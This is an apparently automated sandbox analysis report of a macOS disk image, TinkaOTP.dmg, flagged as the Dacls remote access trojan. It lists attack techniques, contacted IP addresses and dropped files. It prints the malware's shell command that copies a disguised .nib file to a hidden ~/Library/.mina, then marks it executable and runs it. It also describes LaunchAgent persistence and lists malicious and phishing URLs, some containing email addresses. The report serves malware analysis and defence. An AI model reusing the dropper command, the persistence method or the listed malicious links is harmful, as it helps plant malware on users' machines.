Loading ...

Play interactive tourEdit tour

Analysis Report TinkaOTP.dmg

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:101851
Start date:06.05.2020
Start time:15:15:39
Joe Sandbox Product:Cloud
Overall analysis duration:0h 3m 38s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:TinkaOTP.dmg
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, Mojave (Java JDK 11.0.4, Adobe Reader 2019.012.20034, Flash 32.0.0.223)
Run name:Potential for more IOCs and behavior
Detection:MAL
Classification:mal60.troj.evad.macDMG@0/4@0/0

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold600 - 100Report FP / FNfalse
Dacls
malicious

Classification Spiderchart

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting1Hidden Files and Directories21Launch Daemon1Masquerading1Credential DumpingSystem Information Discovery51Application Deployment SoftwareData from Local SystemData CompressedStandard Cryptographic Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaService ExecutionLaunch Daemon1Plist Modification1Hidden Files and Directories21Network SniffingApplication Window DiscoveryRemote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationLC_LOAD_DYLIB Addition1Path InterceptionScripting1Input CaptureQuery RegistryWindows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic ProtocolExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskPlist Modification1DLL Search Order HijackingPlist Modification1Credentials in FilesSystem Network Configuration DiscoveryLogon ScriptsInput CaptureData EncryptedMultiband CommunicationSIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceLaunch Agent2File System Permissions WeaknessMasqueradingAccount ManipulationRemote System DiscoveryShared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings

Signature Overview

Click to jump to signature section


Networking:

barindex
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 67.43.239.146
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Source: unknownTCP traffic detected without corresponding DNS query: 185.62.58.207
Urls found in memory or binary dataShow sources
Source: TinkaOTP.dmgString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49375 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49379
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49375
Source: unknownNetwork traffic detected: HTTP traffic on port 49379 -> 443

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal60.troj.evad.macDMG@0/4@0/0

Persistence and Installation Behavior:

barindex
Executes hidden filesShow sources
Source: /bin/bash (PID: 18267)Hidden file executed: /Users/ben/Library/.mina /Users/ben/Library/.minaJump to behavior
Writes Mach-O files to untypical directoriesShow sources
Source: /bin/cp (PID: 18265)64-bit Mach-O written to unusual path: /Users/ben/Library/.minaJump to dropped file
Changes permissions of written Mach-O filesShow sources
Source: /bin/cp (PID: 18265)Permissions modified for written 64-bit Mach-O /Users/ben/Library/.mina: bits: - usr: r grp: r all: rwJump to dropped file
Creates hidden files, links and/or directoriesShow sources
Source: /bin/cp (PID: 18265)Hidden File created: /Users/ben/Library/.minaJump to behavior
Executes commands using a shell command-line interpreterShow sources
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)Shell command executed: /bin/bash -c cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib ~/Library/.mina > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev/null 2>&1Jump to behavior
Executes the "chmod" command used to modify permissionsShow sources
Source: /bin/bash (PID: 18266)Chmod executable: /bin/chmod -> chmod +x /Users/ben/Library/.minaJump to behavior
Reads launchservices plist filesShow sources
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)Launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Reads user launchservices plist file containing default apps for corresponding file typesShow sources
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)Preferences launchservices plist file read: /Users/ben/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Writes 64-bit Mach-O files to diskShow sources
Source: /bin/cp (PID: 18265)File written: /Users/ben/Library/.minaJump to dropped file
Reads data from the local random generatorShow sources
Source: /Users/ben/Library/.mina (PID: 18268)Random device file read: /dev/urandomJump to behavior
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Writes property list (.plist) files to diskShow sources
Source: /Users/ben/Library/.mina (PID: 18267)XML plist file created: /Users/ben/Library/LaunchAgents/com.aex-loop.agent.plistJump to dropped file

Boot Survival:

barindex
Creates memory-persistent launch servicesShow sources
Source: /Users/ben/Library/.mina (PID: 18267)Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/ben/Library/LaunchAgents/com.aex-loop.agent.plistJump to behavior
Creates user-wide 'launchd' managed services aka launch agentsShow sources
Source: /Users/ben/Library/.mina (PID: 18267)Launch agent created File created: /Users/ben/Library/LaunchAgents/com.aex-loop.agent.plistJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Creates hidden Mach-O filesShow sources
Source: /bin/cp (PID: 18265)Hidden Mach-O file written: Mach-O 64 bit: /Users/ben/Library/.minaJump to dropped file

HIPS / PFW / Operating System Protection Evasion:

barindex
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)Show sources
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)Sysctl read request: kern.safeboot (1.66)Jump to behavior

Language, Device and Operating System Detection:

barindex
Reads hardware related sysctl valuesShow sources
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)Sysctl read request: hw.availcpu (6.25)Jump to behavior
Reads the systems hostnameShow sources
Source: /bin/bash (PID: 18264)Sysctl requested: kern.hostname (1.10)Jump to behavior
Reads the system or server version plist fileShow sources
Source: /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP (PID: 18263)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Dacls RATShow sources
Source: Yara matchFile source: SubMenu.nib, type: SAMPLE
Source: Yara matchFile source: /Users/ben/Library/.mina, type: DROPPED

Remote Access Functionality:

barindex
Yara detected Dacls RATShow sources
Source: Yara matchFile source: SubMenu.nib, type: SAMPLE
Source: Yara matchFile source: /Users/ben/Library/.mina, type: DROPPED

Malware Configuration

No configs have been found

Signature Similarity

Sample Distance (10 = nearest)
10 9 8 7 6 5 4 3 2 1
Samplename Analysis ID SHA256 Similarity


Runtime Messages

Command:open "/Volumes/TinkaOTP/TinkaOTP.app" --args
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 101851 Sample: TinkaOTP.dmg Startdate: 06/05/2020 Architecture: MAC Score: 60 25 185.62.58.207, 443, 49379 unknown Netherlands 2->25 27 67.43.239.146, 443, 49375 unknown Canada 2->27 29 Yara detected Dacls RAT 2->29 9 xpcproxy TinkaOTP 2->9         started        signatures3 process4 process5 11 bash 9->11         started        process6 13 bash cp 1 11->13         started        17 bash .mina 1 11->17         started        19 bash chmod 11->19         started        file7 23 /Users/ben/Library/.mina, Mach-O 13->23 dropped 31 Creates hidden Mach-O files 13->31 33 Writes Mach-O files to untypical directories 13->33 35 Executes hidden files 17->35 21 .mina 1 17->21         started        signatures8 process9

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SubMenu.nibJoeSecurity_DaclsYara detected Dacls RATJoe Security

    PCAP (Network Traffic)

    No yara matches

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    /Users/ben/Library/.minaJoeSecurity_DaclsYara detected Dacls RATJoe Security

      Sigma Overview

      No Sigma rule has matched

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      unknownhttps://t.co/y27Kr7Z7wXGet hashmaliciousBrowse
      • 104.244.42.133
      https://linkprotect.cudasvc.com/url?a=%68%74%74%70%73%3A%2F%2F%74%2E%63%6F%2F%4E%76%38%72%49%30%32%5A%45%4F&c=EGet hashmaliciousBrowse
      • 104.244.42.69
      https://f002.backblazeb2.com/file/wyl2ruk25cvbtv9xps81of/e56dfiimp/z0etj6poadf9y2sev602k0.html?email=undefine#abosschaart@pzem.nlGet hashmaliciousBrowse
      • 192.229.221.185
      oBfsC4t10n2.xlsGet hashmaliciousBrowse
      • 52.114.77.164
      https://peenni.xyz/Admin/login.php?email=nadia.abbassi@swisslife.fr&name=%20ABBASSI%20NadiaGet hashmaliciousBrowse
      • 148.72.65.62
      Documentation.xlsGet hashmaliciousBrowse
      • 185.140.53.48
      Documentation.xlsGet hashmaliciousBrowse
      • 104.18.48.20
      Eventbot.jarGet hashmaliciousBrowse
      • 74.125.143.188
      jazz.exeGet hashmaliciousBrowse
      • 1.3.99.0
      #Ud83d#UdcdeAeriestechnology.com Audio_4544.htmGet hashmaliciousBrowse
      • 23.111.9.35
      SWIFT.exeGet hashmaliciousBrowse
      • 185.140.53.158
      Aeriestechnology.com #Ud83d#UdcdeAudio_4544.htmGet hashmaliciousBrowse
      • 180.150.250.218
      http://chng.it/nQRBfpjZD7Get hashmaliciousBrowse
      • 35.186.220.184
      https://us8.campaign-archive.com/?u=03a536b6064301f5b9e56a1a5&id=a70d4c614eGet hashmaliciousBrowse
      • 151.101.60.193
      https://estilomagnolia.com.ar/COVID-19.htmlGet hashmaliciousBrowse
      • 192.185.188.168
      ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
      • 138.201.84.72
      http://woogle.com/Get hashmaliciousBrowse
      • 192.161.187.200
      https://xurl.es/bz56kGet hashmaliciousBrowse
      • 104.16.132.229
      https://h8.t.hubspotemail.net/e2t/c/*W7HmM9G14pJ7vN919GD-s5dBr0/*W2_cz8f7Rk0N3W1Fc8Qv3D1Q0k0/5/f18dQhb0S9r79jx7M-W4GcZlG2wqbgQW4VSVT16bzZrwVRqVDC64DbVMW4NfVNZ9gpw4MW4PfvXg7v1hvYW7NyyjW8mv-3QW8mQCxy79mDVRV5Gp8s83GbYkW8hGL-k9bVLmzW7sLthR9djgzWW5LMnrb2c2bg7W79-X3K8gvx_4W6YmB6S7JtTqnW8mnw907bjnYCW3m1z8F8h6MtRW5mK37h1h4tZfW6s1-1C3SQgn2W3_CV247WvZcbW41TlcR3Tw-1xW3DrmCK2r5Kr4W2HT8mr6kn_xzMz74JcYSX-5W7m_B1R5c8d-SW3788pM7mNTCXW3Kh5V35QKjhhW3fFMTv8djpxyW9j8Kdg96NrfmW4FxPX82_GnqFW7c9wJr2JxmcrW4LQhN49hxfTXN5tRRv9cyhfHW3s3_hw87Z8vpW37Fssp5vfyNnW8R6rGC6cb1QjW3sBXv68yxkN1W49kJ936fMryTN11rnNb4VjkzW6Mzk0P8pPvtYV1T_l07TncnMW31GHfx12y5tcW5QHPjY7f1VhbVb5y-_27k6TlW1jVk8n2LKhTNN3Z1mnX9XfwsD7s2GRzp-nf2KWKpv03Get hashmaliciousBrowse
      • 13.224.197.9
      https://1drv.ms/b/s!Arr0ZL_iF4eIkzIyxU6TJfnJdfLL?e=qoUvoJGet hashmaliciousBrowse
      • 172.217.168.66
      unknownhttps://t.co/y27Kr7Z7wXGet hashmaliciousBrowse
      • 104.244.42.133
      https://linkprotect.cudasvc.com/url?a=%68%74%74%70%73%3A%2F%2F%74%2E%63%6F%2F%4E%76%38%72%49%30%32%5A%45%4F&c=EGet hashmaliciousBrowse
      • 104.244.42.69
      https://f002.backblazeb2.com/file/wyl2ruk25cvbtv9xps81of/e56dfiimp/z0etj6poadf9y2sev602k0.html?email=undefine#abosschaart@pzem.nlGet hashmaliciousBrowse
      • 192.229.221.185
      oBfsC4t10n2.xlsGet hashmaliciousBrowse
      • 52.114.77.164
      https://peenni.xyz/Admin/login.php?email=nadia.abbassi@swisslife.fr&name=%20ABBASSI%20NadiaGet hashmaliciousBrowse
      • 148.72.65.62
      Documentation.xlsGet hashmaliciousBrowse
      • 185.140.53.48
      Documentation.xlsGet hashmaliciousBrowse
      • 104.18.48.20
      Eventbot.jarGet hashmaliciousBrowse
      • 74.125.143.188
      jazz.exeGet hashmaliciousBrowse
      • 1.3.99.0
      #Ud83d#UdcdeAeriestechnology.com Audio_4544.htmGet hashmaliciousBrowse
      • 23.111.9.35
      SWIFT.exeGet hashmaliciousBrowse
      • 185.140.53.158
      Aeriestechnology.com #Ud83d#UdcdeAudio_4544.htmGet hashmaliciousBrowse
      • 180.150.250.218
      http://chng.it/nQRBfpjZD7Get hashmaliciousBrowse
      • 35.186.220.184
      https://us8.campaign-archive.com/?u=03a536b6064301f5b9e56a1a5&id=a70d4c614eGet hashmaliciousBrowse
      • 151.101.60.193
      https://estilomagnolia.com.ar/COVID-19.htmlGet hashmaliciousBrowse
      • 192.185.188.168
      ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
      • 138.201.84.72
      http://woogle.com/Get hashmaliciousBrowse
      • 192.161.187.200
      https://xurl.es/bz56kGet hashmaliciousBrowse
      • 104.16.132.229
      https://h8.t.hubspotemail.net/e2t/c/*W7HmM9G14pJ7vN919GD-s5dBr0/*W2_cz8f7Rk0N3W1Fc8Qv3D1Q0k0/5/f18dQhb0S9r79jx7M-W4GcZlG2wqbgQW4VSVT16bzZrwVRqVDC64DbVMW4NfVNZ9gpw4MW4PfvXg7v1hvYW7NyyjW8mv-3QW8mQCxy79mDVRV5Gp8s83GbYkW8hGL-k9bVLmzW7sLthR9djgzWW5LMnrb2c2bg7W79-X3K8gvx_4W6YmB6S7JtTqnW8mnw907bjnYCW3m1z8F8h6MtRW5mK37h1h4tZfW6s1-1C3SQgn2W3_CV247WvZcbW41TlcR3Tw-1xW3DrmCK2r5Kr4W2HT8mr6kn_xzMz74JcYSX-5W7m_B1R5c8d-SW3788pM7mNTCXW3Kh5V35QKjhhW3fFMTv8djpxyW9j8Kdg96NrfmW4FxPX82_GnqFW7c9wJr2JxmcrW4LQhN49hxfTXN5tRRv9cyhfHW3s3_hw87Z8vpW37Fssp5vfyNnW8R6rGC6cb1QjW3sBXv68yxkN1W49kJ936fMryTN11rnNb4VjkzW6Mzk0P8pPvtYV1T_l07TncnMW31GHfx12y5tcW5QHPjY7f1VhbVb5y-_27k6TlW1jVk8n2LKhTNN3Z1mnX9XfwsD7s2GRzp-nf2KWKpv03Get hashmaliciousBrowse
      • 13.224.197.9
      https://1drv.ms/b/s!Arr0ZL_iF4eIkzIyxU6TJfnJdfLL?e=qoUvoJGet hashmaliciousBrowse
      • 172.217.168.66

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.